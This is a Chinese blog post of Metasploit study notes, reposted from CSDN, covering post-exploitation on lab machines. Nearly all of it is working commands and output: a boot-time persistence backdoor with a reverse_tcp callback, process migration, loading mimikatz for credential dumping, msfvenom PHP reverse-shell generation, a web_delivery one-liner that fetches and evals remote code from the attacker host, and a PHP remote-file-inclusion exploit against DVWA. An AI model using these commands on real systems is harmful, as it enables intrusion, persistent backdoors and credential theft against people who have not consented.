MSF学习笔记（11）

搬迁到Minggle’Blog

###本地提权漏洞检测

meterpreter > run post/multi/recon/local_exploit_suggester 

###迁移到指定进程

migrate -N explorer.exe

###自动脚本

msf exploit(multi/handler) > set AutoRunScript  migrate -n explorer.exe

msf exploit(multi/handler) > setInitialAutoRunScript  migrate -n explorer.exe
msf exploit(multi/handler) > set AutoRunScript  post/windows/gather/dumplinks		##migrate 到指定用户进程

###信息收集

meterpreter > run winenum 

###持久后门

meterpreter > run persistence -h
OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -X -r 192.168.56.101 -p 4444 -i 10 -P windows/x64/meterpreter/reverse_tcp

###mimikatz

meterpreter > load mimikatz 
meterpreter > mimikatz_command -f a::
Module : 'a' introuvable

Modules disponibles : 
            	- Standard
      crypto	- Cryptographie et certificats
        hash	- Hash
      system	- Gestion syst�me
     process	- Manipulation des processus
      thread	- Manipulation des threads
     service	- Manipulation des services
   privilege	- Manipulation des privil�ges
      handle	- Manipulation des handles
 impersonate	- Manipulation tokens d'acc�s
     winmine	- Manipulation du d�mineur
 minesweeper	- Manipulation du d�mineur 7
       nogpo	- Anti-gpo et patchs divers
     samdump	- Dump de SAM
      inject	- Injecteur de librairies
          ts	- Terminal Server
      divers	- Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
    sekurlsa	- Dump des sessions courantes par providers LSASS
         efs	- Manipulations EFS

meterpreter > mimikatz_command -f winmine::infos		##扫雷作弊器

###输出php脚本

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 -f raw -o a.php
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.56.101
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > set exitonsession no
msf exploit(multi/handler) > exploit -j

###WEB Delivery

msf > use exploit/multi/script/web_delivery 
msf exploit(multi/script/web_delivery) > set lhost 192.168.56.101
msf exploit(multi/script/web_delivery) > set URIPATH /

msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set target 1

msf exploit(multi/script/web_delivery) > set SRVPORT 7777
SRVPORT => 7777
msf exploit(multi/script/web_delivery) > 
msf exploit(multi/script/web_delivery) > 
msf exploit(multi/script/web_delivery) > 
msf exploit(multi/script/web_delivery) > 
msf exploit(multi/script/web_delivery) > exploit -j
[*] Exploit running as background job 6.

[*] Started reverse TCP handler on 192.168.56.101:4444 
[*] Using URL: http://0.0.0.0:7777/
msf exploit(multi/script/web_delivery) > [*] Local IP: http://127.0.0.1:7777/
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.56.101:7777/'));"


远程执行：
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.56.101:7777/'));"

###远程文件包含漏洞

vim /etc/php5/cgi/php.ini
allow_url_fopen=On
allow_url_includ=On
/eth/init.d/apache2 restart

msf > use exploit/unix/webapp/php_include 
msf exploit(unix/webapp/php_include) > set HEADERS "Cookie:security=low; PHPSESSID=7b33e72386f301cd5f0439f308205f98"
msf exploit(unix/webapp/php_include) > set RHOST 192.168.56.104
msf exploit(unix/webapp/php_include) > set PATH /dvwa/vulnerabilities/fi/
msf exploit(unix/webapp/php_include) > set PHPURI /?page=XXpathXX
msf exploit(unix/webapp/php_include) > set payload php/meterpreter/reverse_tcp
msf exploit(unix/webapp/php_include) > set lhost 192.168.56.103
msf exploit(unix/webapp/php_include) > exploit 

来源：CSDN

作者：tianyazm

链接：https://blog.csdn.net/tianyazm/article/details/79315228